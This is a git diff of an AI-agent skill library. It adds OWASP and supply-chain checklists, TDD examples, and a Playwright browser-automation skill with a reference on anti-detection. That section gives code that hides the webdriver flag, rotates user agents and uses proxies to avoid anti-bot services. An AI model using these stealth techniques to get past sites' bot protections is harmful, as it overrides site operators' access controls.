| **aws-solution-architect** | AWS | ECS/EKS, Lambda, VPC design, cost optimization |
| **azure-cloud-architect** | Azure | AKS, App Service, Virtual Networks, Azure DevOps |
| **gcp-cloud-architect** | GCP | GKE, Cloud Run, VPC, Cloud Build *(coming soon)* |
**Multi-cloud vs single-cloud decision:**
- **Single-cloud** (default) — lower operational complexity, deeper managed-service integration, better cost leverage with committed-use discounts
- **Multi-cloud** — required when mandated by compliance/data residency, acquiring companies on different clouds, or needing best-of-breed services across providers (e.g., AWS for compute + GCP for ML)
- **Hybrid** — on-prem + cloud; use when regulated workloads must stay on-prem while burst/non-sensitive workloads run in the cloud
> Start single-cloud. Add a second cloud only when there is a concrete business or compliance driver — not for theoretical redundancy.
---
## Cloud-Agnostic IaC
### Terraform / OpenTofu (Default Choice)
Terraform (or its open-source fork OpenTofu) is the recommended IaC tool for most teams:
- Single language (HCL) across AWS, Azure, GCP, and 3,000+ providers
- State management with remote backends (S3, GCS, Azure Blob)
- Plan-before-apply workflow prevents drift surprises
- Cross-reference **terraform-patterns** for module structure, state isolation, and CI/CD integration
### Pulumi (Programming Language IaC)
Choose Pulumi when the team strongly prefers TypeScript, Python, Go, or C# over HCL:
- Full programming language — loops, conditionals, unit tests native
- Same cloud provider coverage as Terraform
- Easier onboarding for dev teams that resist learning HCL
### When to Use Cloud-Native IaC
| Tool | Use When |
|------|----------|
| **CloudFormation** | AWS-only shop; need native AWS support (StackSets, Service Catalog) |
| **Bicep** | Azure-only shop; simpler syntax than ARM templates |
| **Cloud Deployment Manager** | GCP-only; rare — most GCP teams prefer Terraform |
> **Rule of thumb:** Use Terraform/OpenTofu unless you are 100% committed to a single cloud AND the cloud-native tool offers a feature Terraform cannot replicate (e.g., AWS Service Catalog integration).
---
## Troubleshooting
Check the comprehensive troubleshooting section in `references/deployment_strategies.md`.

View File

@@ -413,6 +413,89 @@ app.use((req, res, next) => {
---
## OWASP Top 10 Quick-Check
Rapid 15-minute assessment — run through each category and note pass/fail. For deep-dive testing, hand off to the **security-pen-testing** skill.
| # | Category | One-Line Check |
|---|----------|----------------|
| A01 | Broken Access Control | Verify role checks on every endpoint; test horizontal privilege escalation |
| A02 | Cryptographic Failures | Confirm TLS 1.2+ everywhere; no secrets in logs or source |
| A03 | Injection | Run parameterized query audit; check ORM raw-query usage |
| A04 | Insecure Design | Review threat model exists for critical flows |
| A05 | Security Misconfiguration | Check default credentials removed; error pages generic |
| A06 | Vulnerable Components | Run `vulnerability_assessor.py`; zero critical/high CVEs |
| A07 | Auth Failures | Verify MFA on admin; brute-force protection active |
| A08 | Software & Data Integrity | Confirm CI/CD pipeline signs artifacts; no unsigned deps |
| A09 | Logging & Monitoring | Validate audit logs capture auth events; alerts configured |
| A10 | SSRF | Test internal URL filters; block metadata endpoints (169.254.169.254) |
> **Deep dive needed?** Hand off to `security-pen-testing` for full OWASP Testing Guide coverage.
---
## Secret Scanning Tools
Choose the right scanner for each stage of your workflow:
| Tool | Best For | Language | Pre-commit | CI/CD | Custom Rules |
|------|----------|----------|:----------:|:-----:|:------------:|
| **gitleaks** | CI pipelines, full-repo scans | Go | Yes | Yes | TOML regexes |
| **detect-secrets** | Pre-commit hooks, incremental | Python | Yes | Partial | Plugin-based |
| **truffleHog** | Deep history scans, entropy | Go | No | Yes | Regex + entropy |
**Recommended setup:** Use `detect-secrets` as a pre-commit hook (catches secrets before they enter history) and `gitleaks` in CI (catches anything that slips through).
```bash
# detect-secrets pre-commit hook (.pre-commit-config.yaml)
- repo: https://github.com/Yelp/detect-secrets
rev: v1.4.0
hooks:
- id: detect-secrets
args: ['--baseline', '.secrets.baseline']
# gitleaks in GitHub Actions
- name: gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITLEAKS_LICENSE: ${{ secrets.GITLEAKS_LICENSE }}
```
---
## Supply Chain Security
Protect against dependency and artifact tampering with SBOM generation, artifact signing, and SLSA compliance.
**SBOM Generation:**
- **syft** — generates SBOMs from container images or source dirs (SPDX, CycloneDX formats)
- **cyclonedx-cli** — CycloneDX-native tooling; merge multiple SBOMs for mono-repos
```bash
# Generate SBOM from container image
syft packages ghcr.io/org/app:latest -o cyclonedx-json > sbom.json
```
**Artifact Signing (Sigstore/cosign):**
```bash
# Sign a container image (keyless via OIDC)
cosign sign ghcr.io/org/app:latest
# Verify signature
cosign verify ghcr.io/org/app:latest --certificate-identity=ci@org.com --certificate-oidc-issuer=https://token.actions.githubusercontent.com
```
**SLSA Levels Overview:**
| Level | Requirement | What It Proves |
|-------|-------------|----------------|
| 1 | Build process documented | Provenance exists |
| 2 | Hosted build service, signed provenance | Tamper-resistant provenance |
| 3 | Hardened build platform, non-falsifiable provenance | Tamper-proof build |
| 4 | Two-party review, hermetic builds | Maximum supply-chain assurance |
> **Cross-references:** `security-pen-testing` (vulnerability exploitation testing), `dependency-auditor` (license and CVE audit for dependencies).
---
## Reference Documentation
| Document | Description |

View File

@@ -1,15 +1,6 @@
---
name: "tdd-guide"
description: "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit. Handles test generation from source code, coverage report parsing (LCOV/JSON/XML), quality scoring, and framework conversion for TypeScript, JavaScript, Python, and Java projects."
triggers:
- generate tests
- analyze coverage
- TDD workflow
- red green refactor
- Jest tests
- Pytest tests
- JUnit tests
- coverage report
description: "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit."
---
# TDD Guide
@@ -148,6 +139,254 @@ Additional scripts: `framework_adapter.py` (convert between frameworks), `metric
---
## Spec-First Workflow
TDD is most effective when driven by a written spec. The flow:
1. **Write or receive a spec** — stored in `specs/<feature>.md`
2. **Extract acceptance criteria** — each criterion becomes one or more test cases
3. **Write failing tests (RED)** — one test per acceptance criterion
4. **Implement minimal code (GREEN)** — satisfy each test in order
5. **Refactor** — clean up while all tests stay green
### Spec Directory Convention
```
project/
├── specs/
│ ├── user-auth.md # Feature spec with acceptance criteria
│ ├── payment-processing.md
│ └── notification-system.md
├── tests/
│ ├── test_user_auth.py # Tests derived from specs/user-auth.md
│ ├── test_payments.py
│ └── test_notifications.py
└── src/
```
### Extracting Tests from Specs
Each acceptance criterion in a spec maps to at least one test:
| Spec Criterion | Test Case |
|---------------|-----------|
| "User can log in with valid credentials" | `test_login_valid_credentials_returns_token` |
| "Invalid password returns 401" | `test_login_invalid_password_returns_401` |
| "Account locks after 5 failed attempts" | `test_login_locks_after_five_failures` |
**Tip:** Number your acceptance criteria in the spec. Reference the number in the test docstring for traceability (`# AC-3: Account locks after 5 failed attempts`).
> **Cross-reference:** See `engineering/spec-driven-workflow` for the full spec methodology, including spec templates and review checklists.
---
## Red-Green-Refactor Examples Per Language
### TypeScript / Jest
```typescript
// test/cart.test.ts
describe("Cart", () => {
describe("addItem", () => {
it("should add a new item to an empty cart", () => {
const cart = new Cart();
cart.addItem({ id: "sku-1", name: "Widget", price: 9.99, qty: 1 });
expect(cart.items).toHaveLength(1);
expect(cart.items[0].id).toBe("sku-1");
});
it("should increment quantity when adding an existing item", () => {
const cart = new Cart();
cart.addItem({ id: "sku-1", name: "Widget", price: 9.99, qty: 1 });
cart.addItem({ id: "sku-1", name: "Widget", price: 9.99, qty: 2 });
expect(cart.items).toHaveLength(1);
expect(cart.items[0].qty).toBe(3);
});
it("should throw when quantity is zero or negative", () => {
const cart = new Cart();
expect(() =>
cart.addItem({ id: "sku-1", name: "Widget", price: 9.99, qty: 0 })
).toThrow("Quantity must be positive");
});
});
});
```
### Python / Pytest (Advanced Patterns)
```python
# tests/conftest.py — shared fixtures
import pytest
from app.db import create_engine, Session
@pytest.fixture(scope="session")
def db_engine():
engine = create_engine("sqlite:///:memory:")
yield engine
engine.dispose()
@pytest.fixture
def db_session(db_engine):
session = Session(bind=db_engine)
yield session
session.rollback()
session.close()
# tests/test_pricing.py — parametrize for multiple cases
import pytest
from app.pricing import calculate_discount
@pytest.mark.parametrize("subtotal, expected_discount", [
(50.0, 0.0), # Below threshold — no discount
(100.0, 5.0), # 5% tier
(250.0, 25.0), # 10% tier
(500.0, 75.0), # 15% tier
])
def test_calculate_discount(subtotal, expected_discount):
assert calculate_discount(subtotal) == pytest.approx(expected_discount)
```
### Go — Table-Driven Tests
```go
// cart_test.go
package cart
import "testing"
func TestApplyDiscount(t *testing.T) {
tests := []struct {
name string
subtotal float64
want float64
}{
{"no discount below threshold", 50.0, 0.0},
{"5 percent tier", 100.0, 5.0},
{"10 percent tier", 250.0, 25.0},
{"15 percent tier", 500.0, 75.0},
{"zero subtotal", 0.0, 0.0},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got := ApplyDiscount(tt.subtotal)
if got != tt.want {
t.Errorf("ApplyDiscount(%v) = %v, want %v", tt.subtotal, got, tt.want)
}
})
}
}
```
---
## Bounded Autonomy Rules
When generating tests autonomously, follow these rules to decide when to stop and ask the user:
### Stop and Ask When
- **Ambiguous requirements** — the spec or user story has conflicting or unclear acceptance criteria
- **Missing edge cases** — you cannot determine boundary values without domain knowledge (e.g., max allowed transaction amount)
- **Test count exceeds 50** — large test suites need human review before committing; present a summary and ask which areas to prioritize
- **External dependencies unclear** — the feature relies on third-party APIs or services with undocumented behavior
- **Security-sensitive logic** — authentication, authorization, encryption, or payment flows require human sign-off on test scenarios
### Continue Autonomously When
- **Clear spec with numbered acceptance criteria** — each criterion maps directly to tests
- **Straightforward CRUD operations** — create, read, update, delete with well-defined models
- **Well-defined API contracts** — OpenAPI spec or typed interfaces available
- **Pure functions** — deterministic input/output with no side effects
- **Existing test patterns** — the codebase already has similar tests to follow
---
## Property-Based Testing
Property-based testing generates random inputs to verify invariants instead of relying on hand-picked examples. Use it when the input space is large and the expected behavior can be described as a property.
### Python — Hypothesis
```python
from hypothesis import given, strategies as st
from app.serializers import serialize, deserialize
@given(st.text())
def test_roundtrip_serialization(data):
"""Serialization followed by deserialization returns the original."""
assert deserialize(serialize(data)) == data
@given(st.integers(), st.integers())
def test_addition_is_commutative(a, b):
assert a + b == b + a
```
### TypeScript — fast-check
```typescript
import fc from "fast-check";
import { encode, decode } from "./codec";
test("encode/decode roundtrip", () => {
fc.assert(
fc.property(fc.string(), (input) => {
expect(decode(encode(input))).toBe(input);
})
);
});
```
### When to Use Property-Based Over Example-Based
| Use Property-Based | Example |
|-------------------|---------|
| Data transformations | Serialize/deserialize roundtrips |
| Mathematical properties | Commutativity, associativity, idempotency |
| Encoding/decoding | Base64, URL encoding, compression |
| Sorting and filtering | Output is sorted, length preserved |
| Parser correctness | Valid input always parses without error |
---
## Mutation Testing
Mutation testing modifies your production code (creates "mutants") and checks whether your tests catch the changes. If a mutant survives (tests still pass), your tests have a gap that coverage alone cannot reveal.
### Tools
| Language | Tool | Command |
|----------|------|---------|
| TypeScript/JavaScript | **Stryker** | `npx stryker run` |
| Python | **mutmut** | `mutmut run --paths-to-mutate=src/` |
| Java | **PIT** | `mvn org.pitest:pitest-maven:mutationCoverage` |
### Why Mutation Testing Matters
- **100% line coverage != good tests** — coverage tells you code was executed, not that it was verified
- **Catches weak assertions** — tests that run code but assert nothing meaningful
- **Finds missing boundary tests** — mutants that change `<` to `<=` expose off-by-one gaps
- **Quantifiable quality metric** — mutation score (% mutants killed) is a stronger signal than coverage %
**Recommendation:** Run mutation testing on critical paths (auth, payments, data processing) even if overall coverage is high. Target 85%+ mutation score on P0 modules.
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| `engineering/spec-driven-workflow` | Spec → acceptance criteria → test extraction pipeline |
| `engineering-team/focused-fix` | Phase 5 (Verify) uses TDD to confirm the fix with a regression test |
| `engineering-team/senior-qa` | Broader QA strategy; TDD is one layer in the test pyramid |
| `engineering-team/code-reviewer` | Review generated tests for assertion quality and coverage completeness |
| `engineering-team/senior-fullstack` | Project scaffolders include testing infrastructure compatible with TDD workflows |
---
## Limitations
| Scope | Details |

View File

@@ -1,6 +1,6 @@
{
"name": "engineering-advanced-skills",
"description": "31 advanced engineering skills: agent designer, agent workflow designer, AgentHub, RAG architect, database designer, migration architect, observability designer, dependency auditor, release manager, API reviewer, CI/CD pipeline builder, MCP server builder, skill security auditor, performance profiler, Helm chart builder, Terraform patterns, focused-fix, and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
"description": "33 advanced engineering skills: agent designer, agent workflow designer, AgentHub, RAG architect, database designer, migration architect, observability designer, dependency auditor, release manager, API reviewer, CI/CD pipeline builder, MCP server builder, skill security auditor, performance profiler, Helm chart builder, Terraform patterns, focused-fix, browser-automation, spec-driven-workflow, and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
"version": "2.1.2",
"author": {
"name": "Alireza Rezvani",

View File

@@ -0,0 +1,564 @@
---
name: "browser-automation"
description: "Use when the user asks to automate browser tasks, scrape websites, fill forms, capture screenshots, extract structured data from web pages, or build web automation workflows. NOT for testing — use playwright-pro for that."
---
# Browser Automation - POWERFUL
## Overview
The Browser Automation skill provides comprehensive tools and knowledge for building production-grade web automation workflows using Playwright. This skill covers data extraction, form filling, screenshot capture, session management, and anti-detection patterns for reliable browser automation at scale.
**When to use this skill:**
- Scraping structured data from websites (tables, listings, search results)
- Automating multi-step browser workflows (login, fill forms, download files)
- Capturing screenshots or PDFs of web pages
- Extracting data from SPAs and JavaScript-heavy sites
- Building repeatable browser-based data pipelines
**When NOT to use this skill:**
- Writing browser tests or E2E test suites — use **playwright-pro** instead
- Testing API endpoints — use **api-test-suite-builder** instead
- Load testing or performance benchmarking — use **performance-profiler** instead
**Why Playwright over Selenium or Puppeteer:**
- **Auto-wait built in** — no explicit `sleep()` or `waitForElement()` needed for most actions
- **Multi-browser from one API** — Chromium, Firefox, WebKit with zero config changes
- **Network interception** — block ads, mock responses, capture API calls natively
- **Browser contexts** — isolated sessions without spinning up new browser instances
- **Codegen** — `playwright codegen` records your actions and generates scripts
- **Async-first** — Python async/await for high-throughput scraping
## Core Competencies
### 1. Web Scraping Patterns
#### DOM Extraction with CSS Selectors
CSS selectors are the primary tool for element targeting. Prefer them over XPath for readability and performance.
**Selector priority (most to least reliable):**
1. `data-testid`, `data-id`, or custom data attributes — stable across redesigns
2. `#id` selectors — unique but may change between deploys
3. Semantic selectors: `article`, `nav`, `main`, `section` — resilient to CSS changes
4. Class-based: `.product-card`, `.price` — brittle if classes are generated (e.g., CSS modules)
5. Positional: `nth-child()`, `nth-of-type()` — last resort, breaks on layout changes
**Compound selectors for precision:**
```python
# Product cards within a specific container
page.query_selector_all("div.search-results > article.product-card")
# Price inside a product card (scoped)
card.query_selector("span[data-field='price']")
# Links with specific text content
page.locator("a", has_text="Next Page")
```
#### XPath for Complex Traversal
Use XPath only when CSS cannot express the relationship:
```python
# Find element by text content (XPath strength)
page.locator("//td[contains(text(), 'Total')]/following-sibling::td[1]")
# Navigate up the DOM tree
page.locator("//span[@class='price']/ancestor::div[@class='product']")
```
#### Pagination Patterns
- **Next-button pagination**: Click "Next" until disabled or absent
- **URL-based pagination**: Increment `?page=N` or `&offset=N` in URL
- **Infinite scroll**: Scroll to bottom, wait for new content, repeat until no change
- **Load-more button**: Click button, wait for DOM mutation, repeat
#### Infinite Scroll Handling
```python
async def scroll_to_bottom(page, max_scrolls=50, pause_ms=1500):
previous_height = 0
for i in range(max_scrolls):
current_height = await page.evaluate("document.body.scrollHeight")
if current_height == previous_height:
break
await page.evaluate("window.scrollTo(0, document.body.scrollHeight)")
await page.wait_for_timeout(pause_ms)
previous_height = current_height
return i + 1 # number of scrolls performed
```
### 2. Form Filling & Multi-Step Workflows
#### Login Flows
```python
async def login(page, url, username, password):
await page.goto(url)
await page.fill("input[name='username']", username)
await page.fill("input[name='password']", password)
await page.click("button[type='submit']")
# Wait for navigation to complete (post-login redirect)
await page.wait_for_url("**/dashboard**")
```
#### Multi-Page Forms
Break multi-step forms into discrete functions per step. Each function:
1. Fills the fields for that step
2. Clicks the "Next" or "Continue" button
3. Waits for the next step to load (URL change or DOM element)
```python
async def fill_step_1(page, data):
await page.fill("#first-name", data["first_name"])
await page.fill("#last-name", data["last_name"])
await page.select_option("#country", data["country"])
await page.click("button:has-text('Continue')")
await page.wait_for_selector("#step-2-form")
async def fill_step_2(page, data):
await page.fill("#address", data["address"])
await page.fill("#city", data["city"])
await page.click("button:has-text('Continue')")
await page.wait_for_selector("#step-3-form")
```
#### File Uploads
```python
# Single file
await page.set_input_files("input[type='file']", "/path/to/file.pdf")
# Multiple files
await page.set_input_files("input[type='file']", [
"/path/to/file1.pdf",
"/path/to/file2.pdf"
])
# Drag-and-drop upload zones (no visible input element)
async with page.expect_file_chooser() as fc_info:
await page.click("div.upload-zone")
file_chooser = await fc_info.value
await file_chooser.set_files("/path/to/file.pdf")
```
#### Dropdown and Select Handling
```python
# Native <select> element
await page.select_option("#country", value="US")
await page.select_option("#country", label="United States")
# Custom dropdown (div-based)
await page.click("div.dropdown-trigger")
await page.click("div.dropdown-option:has-text('United States')")
```
### 3. Screenshot & PDF Capture
#### Screenshot Strategies
```python
# Full page (scrolls automatically)
await page.screenshot(path="full-page.png", full_page=True)
# Viewport only (what's visible)
await page.screenshot(path="viewport.png")
# Specific element
element = page.locator("div.chart-container")
await element.screenshot(path="chart.png")
# With custom viewport for consistency
context = await browser.new_context(viewport={"width": 1920, "height": 1080})
```
#### PDF Generation
```python
# Only works in Chromium
await page.pdf(
path="output.pdf",
format="A4",
margin={"top": "1cm", "right": "1cm", "bottom": "1cm", "left": "1cm"},
print_background=True
)
```
#### Visual Regression Baselines
Take screenshots at known states and compare pixel-by-pixel. Store baselines in version control. Use naming conventions: `{page}_{viewport}_{state}.png`.
### 4. Structured Data Extraction
#### Tables to JSON
```python
async def extract_table(page, selector):
headers = await page.eval_on_selector_all(
f"{selector} thead th",
"elements => elements.map(e => e.textContent.trim())"
)
rows = await page.eval_on_selector_all(
f"{selector} tbody tr",
"""rows => rows.map(row => {
return Array.from(row.querySelectorAll('td'))
.map(cell => cell.textContent.trim())
})"""
)
return [dict(zip(headers, row)) for row in rows]
```
#### Listings to Arrays
```python
async def extract_listings(page, container_sel, field_map):
"""
field_map example: {"title": "h3.title", "price": "span.price", "url": "a::attr(href)"}
"""
items = []
cards = await page.query_selector_all(container_sel)
for card in cards:
item = {}
for field, sel in field_map.items():
if "::attr(" in sel:
attr_sel, attr_name = sel.split("::attr(")
attr_name = attr_name.rstrip(")")
el = await card.query_selector(attr_sel)
item[field] = await el.get_attribute(attr_name) if el else None
else:
el = await card.query_selector(sel)
item[field] = (await el.text_content()).strip() if el else None
items.append(item)
return items
```
#### Nested Data Extraction
For threaded content (comments with replies), use recursive extraction:
```python
async def extract_comments(page, parent_selector):
comments = []
elements = await page.query_selector_all(f"{parent_selector} > .comment")
for el in elements:
text = await (await el.query_selector(".comment-body")).text_content()
author = await (await el.query_selector(".author")).text_content()
replies = await extract_comments(el, ".replies")
comments.append({
"author": author.strip(),
"text": text.strip(),
"replies": replies
})
return comments
```
### 5. Cookie & Session Management
#### Save and Restore Sessions
```python
import json
# Save cookies after login
cookies = await context.cookies()
with open("session.json", "w") as f:
json.dump(cookies, f)
# Restore session in new context
with open("session.json", "r") as f:
cookies = json.load(f)
context = await browser.new_context()
await context.add_cookies(cookies)
```
#### Storage State (Cookies + Local Storage)
```python
# Save full state (cookies + localStorage + sessionStorage)
await context.storage_state(path="state.json")
# Restore full state
context = await browser.new_context(storage_state="state.json")
```
**Best practice:** Save state after login, reuse across scraping sessions. Check session validity before starting a long job — make a lightweight request to a protected page and verify you are not redirected to login.
### 6. Anti-Detection Patterns
Modern websites detect automation through multiple vectors. Address all of them:
#### User Agent Rotation
Never use the default Playwright user agent. Rotate through real browser user agents:
```python
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
]
```
#### Viewport and Screen Size
Set realistic viewport dimensions. The default 800x600 is a red flag:
```python
context = await browser.new_context(
viewport={"width": 1920, "height": 1080},
screen={"width": 1920, "height": 1080},
user_agent=random.choice(USER_AGENTS),
)
```
#### WebDriver Flag Removal
Playwright sets `navigator.webdriver = true`. Remove it:
```python
await page.add_init_script("""
Object.defineProperty(navigator, 'webdriver', {get: () => undefined});
""")
```
#### Request Throttling
Add human-like delays between actions:
```python
import random
async def human_delay(min_ms=500, max_ms=2000):
delay = random.randint(min_ms, max_ms)
await page.wait_for_timeout(delay)
```
#### Proxy Support
```python
browser = await playwright.chromium.launch(
proxy={"server": "http://proxy.example.com:8080"}
)
# Or per-context:
context = await browser.new_context(
proxy={"server": "http://proxy.example.com:8080",
"username": "user", "password": "pass"}
)
```
### 7. Dynamic Content Handling
#### SPA Rendering
SPAs render content client-side. Wait for the actual content, not the page load:
```python
await page.goto(url)
# Wait for the data to render, not just the shell
await page.wait_for_selector("div.product-list article", state="attached")
```
#### AJAX / Fetch Waiting
Intercept and wait for specific API calls:
```python
async with page.expect_response("**/api/products*") as response_info:
await page.click("button.load-more")
response = await response_info.value
data = await response.json() # You can use the API data directly
```
#### Shadow DOM Traversal
```python
# Playwright pierces open Shadow DOM automatically with >>
await page.locator("custom-element >> .inner-class").click()
```
#### Lazy-Loaded Images
Scroll elements into view to trigger lazy loading:
```python
images = await page.query_selector_all("img[data-src]")
for img in images:
await img.scroll_into_view_if_needed()
await page.wait_for_timeout(200)
```
### 8. Error Handling & Retry Logic
#### Retry Decorator Pattern
```python
import asyncio
async def with_retry(coro_factory, max_retries=3, backoff_base=2):
for attempt in range(max_retries):
try:
return await coro_factory()
except Exception as e:
if attempt == max_retries - 1:
raise
wait = backoff_base ** attempt
print(f"Attempt {attempt + 1} failed: {e}. Retrying in {wait}s...")
await asyncio.sleep(wait)
```
#### Handling Common Failures
```python
from playwright.async_api import TimeoutError as PlaywrightTimeout
try:
await page.click("button.submit", timeout=5000)
except PlaywrightTimeout:
# Element did not appear — page structure may have changed
# Try fallback selector
await page.click("[type='submit']", timeout=5000)
except Exception as e:
# Network error, browser crash, etc.
await page.screenshot(path="error-state.png")
raise
```
#### Rate Limit Detection
```python
async def check_rate_limit(response):
if response.status == 429:
retry_after = response.headers.get("retry-after", "60")
wait_seconds = int(retry_after)
print(f"Rate limited. Waiting {wait_seconds}s...")
await asyncio.sleep(wait_seconds)
return True
return False
```
## Workflows
### Workflow 1: Single-Page Data Extraction
**Scenario:** Extract product data from a single page with JavaScript-rendered content.
**Steps:**
1. Launch browser in headed mode during development (`headless=False`), switch to headless for production
2. Navigate to URL and wait for content selector
3. Extract data using `query_selector_all` with field mapping
4. Validate extracted data (check for nulls, expected types)
5. Output as JSON
```python
async def extract_single_page(url, selectors):
async with async_playwright() as p:
browser = await p.chromium.launch(headless=True)
context = await browser.new_context(
viewport={"width": 1920, "height": 1080},
user_agent="Mozilla/5.0 ..."
)
page = await context.new_page()
await page.goto(url, wait_until="networkidle")
data = await extract_listings(page, selectors["container"], selectors["fields"])
await browser.close()
return data
```
### Workflow 2: Multi-Page Scraping with Pagination
**Scenario:** Scrape search results across 50+ pages.
**Steps:**
1. Launch browser with anti-detection settings
2. Navigate to first page
3. Extract data from current page
4. Check if "Next" button exists and is enabled
5. Click next, wait for new content to load (not just navigation)
6. Repeat until no next page or max pages reached
7. Deduplicate results by unique key
8. Write output incrementally (don't hold everything in memory)
```python
async def scrape_paginated(base_url, selectors, max_pages=100):
all_data = []
async with async_playwright() as p:
browser = await p.chromium.launch(headless=True)
page = await (await browser.new_context()).new_page()
await page.goto(base_url)
for page_num in range(max_pages):
items = await extract_listings(page, selectors["container"], selectors["fields"])
all_data.extend(items)
next_btn = page.locator(selectors["next_button"])
if await next_btn.count() == 0 or await next_btn.is_disabled():
break
await next_btn.click()
await page.wait_for_selector(selectors["container"])
await human_delay(800, 2000)
await browser.close()
return all_data
```
### Workflow 3: Authenticated Workflow Automation
**Scenario:** Log into a portal, navigate a multi-step form, download a report.
**Steps:**
1. Check for existing session state file
2. If no session, perform login and save state
3. Navigate to target page using saved session
4. Fill multi-step form with provided data
5. Wait for download to trigger
6. Save downloaded file to target directory
```python
async def authenticated_workflow(credentials, form_data, download_dir):
async with async_playwright() as p:
browser = await p.chromium.launch(headless=True)
state_file = "session_state.json"
# Restore or create session
if os.path.exists(state_file):
context = await browser.new_context(storage_state=state_file)
else:
context = await browser.new_context()
page = await context.new_page()
await login(page, credentials["url"], credentials["user"], credentials["pass"])
await context.storage_state(path=state_file)
page = await context.new_page()
await page.goto(form_data["target_url"])
# Fill form steps
for step_fn in [fill_step_1, fill_step_2]:
await step_fn(page, form_data)
# Handle download
async with page.expect_download() as dl_info:
await page.click("button:has-text('Download Report')")
download = await dl_info.value
await download.save_as(os.path.join(download_dir, download.suggested_filename))
await browser.close()
```
## Tools Reference
| Script | Purpose | Key Flags | Output |
|--------|---------|-----------|--------|
| `scraping_toolkit.py` | Generate Playwright scraping script skeleton | `--url`, `--selectors`, `--paginate`, `--output` | Python script or JSON config |
| `form_automation_builder.py` | Generate form-fill automation script from field spec | `--fields`, `--url`, `--output` | Python automation script |
| `anti_detection_checker.py` | Audit a Playwright script for detection vectors | `--file`, `--verbose` | Risk report with score |
All scripts are stdlib-only. Run `python3 <script> --help` for full usage.
## Anti-Patterns
### Hardcoded Waits
**Bad:** `await page.wait_for_timeout(5000)` before every action.
**Good:** Use `wait_for_selector`, `wait_for_url`, `expect_response`, or `wait_for_load_state`. Hardcoded waits are flaky and slow.
### No Error Recovery
**Bad:** Linear script that crashes on first failure.
**Good:** Wrap each page interaction in try/except. Take error-state screenshots. Implement retry with exponential backoff.
### Ignoring robots.txt
**Bad:** Scraping without checking robots.txt directives.
**Good:** Fetch and parse robots.txt before scraping. Respect `Crawl-delay`. Skip disallowed paths. Add your bot name to User-Agent if running at scale.
### Storing Credentials in Scripts
**Bad:** Hardcoding usernames and passwords in Python files.
**Good:** Use environment variables, `.env` files (gitignored), or a secrets manager. Pass credentials via CLI arguments.
### No Rate Limiting
**Bad:** Hammering a site with 100 requests/second.
**Good:** Add random delays between requests (1-3s for polite scraping). Monitor for 429 responses. Implement exponential backoff.
### Selector Fragility
**Bad:** Relying on auto-generated class names (`.css-1a2b3c`) or deep nesting (`div > div > div > span:nth-child(3)`).
**Good:** Use data attributes, semantic HTML, or text-based locators. Test selectors in browser DevTools first.
### Not Cleaning Up Browser Instances
**Bad:** Launching browsers without closing them, leading to resource leaks.
**Good:** Always use `try/finally` or async context managers to ensure `browser.close()` is called.
### Running Headed in Production
**Bad:** Using `headless=False` in production/CI.
**Good:** Develop with headed mode for debugging, deploy with `headless=True`. Use environment variable to toggle: `headless = os.environ.get("HEADLESS", "true") == "true"`.
## Cross-References
- **playwright-pro** — Browser testing skill. Use for E2E tests, test assertions, test fixtures. Browser Automation is for data extraction and workflow automation, not testing.
- **api-test-suite-builder** — When the website has a public API, hit the API directly instead of scraping the rendered page. Faster, more reliable, less detectable.
- **performance-profiler** — If your automation scripts are slow, profile the bottlenecks before adding concurrency.
- **env-secrets-manager** — For securely managing credentials used in authenticated automation workflows.

View File

@@ -0,0 +1,453 @@
# Anti-Detection Patterns for Browser Automation
This reference covers techniques to make Playwright automation less detectable by anti-bot services. These are defense-in-depth measures — no single technique is sufficient, but combining them significantly reduces detection risk.
## Detection Vectors
Anti-bot systems detect automation through multiple signals. Understanding what they check helps you counter effectively.
### Tier 1: Trivial Detection (Every Site Checks These)
1. **navigator.webdriver** — Set to `true` by all automation frameworks
2. **User-Agent string** — Default headless UA contains "HeadlessChrome"
3. **WebGL renderer** — Headless Chrome reports "SwiftShader" or "Google SwiftShader"
### Tier 2: Common Detection (Most Anti-Bot Services)
4. **Viewport/screen dimensions** — Unusual sizes flag automation
5. **Plugins array** — Empty in headless mode, populated in real browsers
6. **Languages** — Missing or mismatched locale
7. **Request timing** — Machine-speed interactions
8. **Mouse movement** — No mouse events between clicks
### Tier 3: Advanced Detection (Cloudflare, DataDome, PerimeterX)
9. **Canvas fingerprint** — Headless renders differently
10. **WebGL fingerprint** — GPU-specific rendering variations
11. **Audio fingerprint** — AudioContext processing differences
12. **Font enumeration** — Different available fonts in headless
13. **Behavioral analysis** — Scroll patterns, click patterns, reading time
## Stealth Techniques
### 1. WebDriver Flag Removal
The most critical fix. Every anti-bot check starts here.
```python
await page.add_init_script("""
// Remove webdriver flag
Object.defineProperty(navigator, 'webdriver', {
get: () => undefined,
});
// Remove Playwright-specific properties
delete window.__playwright;
delete window.__pw_manual;
""")
```
### 2. User Agent Configuration
Match the user agent to the browser you are launching. A Chrome UA with Firefox-specific headers is a red flag.
```python
# Chrome 120 on Windows 10 (most common configuration globally)
CHROME_WIN = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
# Chrome 120 on macOS
CHROME_MAC = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
# Chrome 120 on Linux
